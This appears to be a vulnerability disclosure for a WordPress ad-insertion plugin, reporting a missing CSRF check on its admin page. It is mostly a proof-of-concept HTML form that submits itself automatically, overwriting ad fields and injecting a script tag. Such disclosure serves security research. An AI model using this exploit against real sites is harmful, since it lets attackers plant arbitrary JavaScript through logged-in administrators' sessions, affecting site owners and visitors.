The plugin does not perform CSRF checks on updates to its admin page, allowing an attacker to trick a logged in user to manipulate ads and inject arbitrary javascript via submitting a form.
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wordpress-plugin-for-simple-google-adsense-insertion/WP-Simple-Adsense-Insertion.php" method="POST">
<input type="text" name="info_update" value="true">
<input type="text" name="wp_ad_camp_1_code" value="hacked">
<input type="text" name="wp_ad_camp_2_code" value="<script>alert('boo!')</script>">
<input type="text" name="wp_ad_camp_3_code" value="">
<input type="text" name="wp_ad_camp_4_code" value="">
<input type="text" name="wp_ad_camp_5_code" value="">
<input type="text" name="wp_in_article_ad_code" value="">
<input type="text" name="wp_post_article_ad_code" value="hacked">
<input type="text" name="info_update" value="Update options">
</form>
<script>
document.getElementById("test").submit();
</script>